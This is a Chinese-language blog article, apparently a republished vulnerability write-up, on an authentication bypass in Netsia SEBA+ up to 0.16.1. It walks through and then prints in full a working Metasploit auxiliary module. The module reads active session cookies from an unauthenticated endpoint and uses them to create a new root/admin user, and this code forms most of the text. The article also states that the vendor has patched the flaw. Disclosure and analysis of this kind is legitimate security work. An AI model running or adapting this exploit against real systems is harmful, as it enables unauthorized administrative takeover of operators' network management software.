您好,登錄后才能下訂單哦!
小編給大家分享一下Netsia-SEBA認證繞過漏洞的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
不幸的是,由于我無法訪問到產品的源代碼,因此我無法跟大家詳細描述該漏洞的原始成因。
在應用程序中,對““Active Sessions”部分HTTP請求可以由root/admin用戶訪問,而不需要任何會話(cookie)信息。因此,我們就可以從響應中讀取應用程序中活動用戶的會話cookie信息內容。
需要注意的是,我們無法在應用程序的其他地方發送類似的請求。換句話說,我們只能在“Active Sessions”這里才能夠在沒有會話信息的情況下發送這種請求。
通過執行“GET /session/list/allActiveSession”請求,我們可以通過獲取響應返回的會話信息來獲取授權用戶的cookie值。
此時,我們手上是有一個cookie值的,但會話很可能馬上就結束了。所以最好的攻擊向量就是創建一個新用戶。
因此,我們可以在“POST /authentication server/user/add”字段中附帶請求所必須的數據來向應用程序添加一個新的root用戶。
在上圖所執行的攻擊中,在獲得登錄用戶的cookie值后,未經授權的攻擊者可以通過將此cookie值放置在用戶添加請求中來創建具有完整權限的新用戶,具體如下圖所示:
如上圖所示,HTTP響應表明請求的用戶已成功添加。稍后,攻擊者可以輕松地使用這個具有完整權限的用戶登錄到應用程序并執行所有其他操作。
Metasploit框架包括數百個執行掃描,模糊(漏洞檢查),嗅探等輔助模塊。 雖然這些模塊不會給你一個外殼,但它們在進行滲透測試時非常有價值。“show auxiliary”可以顯示所有的輔助模塊:
漏洞利用模塊通常是為在系統上執行命令而編寫的,而MSF的Auxiliary適用于各種常見類型的漏洞,比如說從目標主機獲取信息,或利用目標主機中的現有漏洞來創建新的攻擊向量。
因此,我們可以利用MSF的Auxiliary模塊來對這個漏洞進行利用設計。
class MetasploitModule < Msf::Auxiliary
此時不會生成Payload,因為我們沒有選擇Msf::Exploit::Remote。
接下來,我們將分配用戶名和密碼作為注冊選項。這里使用的是Rex::Text.rand_text_alphanumeric()函數來生成密碼隨機值,該功能可以為漏洞利用提供便利。
register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [true, 'The username for your new account']), OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) ])
接下來,請求“/session/list/allActiveSession”,并根據響應進行檢查。如果響應中包含“sessionId”,則表示存在活動會話。如果沒有“sessionId”且包含“SUCCESS”,則表示應用程序易受攻擊,但沒有活動會話。
def check begin res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) rescue return Exploit::CheckCode::Unknown end if res.code == 200 and res.body.include? 'sessionId' return Exploit::CheckCode::Vulnerable else if res.code == 200 and res.body.include? 'SUCCESS' print_status("Target is vulnerable! But active admin session was not found. Try again later.") return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe End
如上所述的檢查模塊就足以完成該過程,我們不需要讓Auxiliary去運行不必要的檢測,因為如果目標不存在漏洞,則執行其他操作毫無意義。
unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') End
接下來,我們就可以開始編寫漏洞利用代碼了。
首先,我們需要了解Netsia SEBA+應用程序中有多少活動會話。因為可以有多個用戶處于活動狀態,其中一些可能不是授權用戶,而我們需要使用權限最高的活躍用戶來進行攻擊。因此,我決定創建一個單獨的計數方法。
def count_user(data, find_string) data.scan(/(?=#{find_string})/).count End
我們將把HTTP響應指定為數據,并且查找字符串“sessionId”。這樣一來,返回的響應中“sessionId”的數量就意味著有同樣多的用戶處于活動狀態,稍后我們還需要提取這些sessionId值。
res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) sescount = count_user(res.body,'"name"') print_good("Currently #{sescount} active sessions have been detected.")
以上部分完成了第一步操作,接下來需要提取sessionId值。
“sessionId”:“和”“action”之間的部分是sessionId在響應中的值,我們可以使用scan ()函數來搜索正則表達式([\S\s]*?)來實現我們的目標。
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
在上述過程中,cookies[0]將是第一個用戶的sessionId值,而cookies[1]則是第二個用戶的sessionId值,此時計數+1。
現在,我們將應用一個非常簡單的向量來進行開發。
我們將發送一個包含所有活動cookie值的用戶創建請求,無論這些cookie中的哪一個被授權,它都將在我們想要的用戶數據庫中創建新用戶。
在這里我選擇使用while循環。例如,有7個活動用戶,而這個循環將為cookies[int]變量中的值加上+1,并發出各種可能的請求。
while $i <= sescount do sessloop = cookies[$i] sessid = "SESSION=" + sessloop.to_s cookie = sessid.split('"]').join('').split('["').join('') $i +=1 json_data=[........] res = send_request_raw({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), 'cookie' => cookie, 'data' => json_data }) End
像上面這樣的循環對于這個向量就足夠了。最后,我們需要檢查請求是否成功。
如果創建了所需的用戶,它將提供信息并返回新創建的用戶信息。
if res.code == 200 and res.body.include? '"SUCCESS"' print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") print_good("Username : #{datastore["USERNAME"]}") print_good("Password : #{datastore["PASSWORD"]}") break End
Auxiliary模塊現在已完成,接下來我們將所有內容整合在一起:
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , 'Description' => %q{ This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, can be performed without the need for any session(cookie) information. Therefore, the session cookie informations of the active users in the application can be read from the response content. A new authorized user can be created with the obtained cookie. }, 'References' => [ [ 'CVE', '' ], [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], [ 'URL', 'https://www.netsia.com' ] ], 'Author' => [ '?zkan Mustafa AKKU? ' # Discovery & PoC & MSF Module @ehakkus ], 'License' => MSF_LICENSE, 'DisclosureDate' => "2021-01-06", 'DefaultOptions' => { 'SSL' => true } )) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [true, 'The username for your new account']), OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) ]) end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end def check begin res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) rescue return Exploit::CheckCode::Unknown end if res.code == 200 and res.body.include? 'sessionId' return Exploit::CheckCode::Vulnerable else if res.code == 200 and res.body.include? 'SUCCESS' print_status("Target is vulnerable! But active admin session was not found. Try again later.") return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe end def count_user(data, find_string) data.scan(/(?=#{find_string})/).count end def run unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), ) sescount = count_user(res.body,'"name"') print_good("Currently #{sescount} active sessions have been detected.") cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) puts cookies $i = 0 while $i <= sescount do sessloop = cookies[$i] sessid = "SESSION=" + sessloop.to_s cookie = sessid.split('"]').join('').split('["').join('') $i +=1 json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' res = send_request_raw({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), 'cookie' => cookie, 'data' => json_data }) if res.code == 200 and res.body.include? '"SUCCESS"' print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") print_good("Username : #{datastore["USERNAME"]}") print_good("Password : #{datastore["PASSWORD"]}") break end end end end
接下來,我們就可以使用Auxiliary模塊來進行漏洞利用了:
Netsia現已修復了這個漏洞,如果沒有授權的cookie,則無法再發送此請求。即使您是授權的管理員用戶,也會看到會話cookies被過濾掉。
以上是“Netsia-SEBA認證繞過漏洞的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。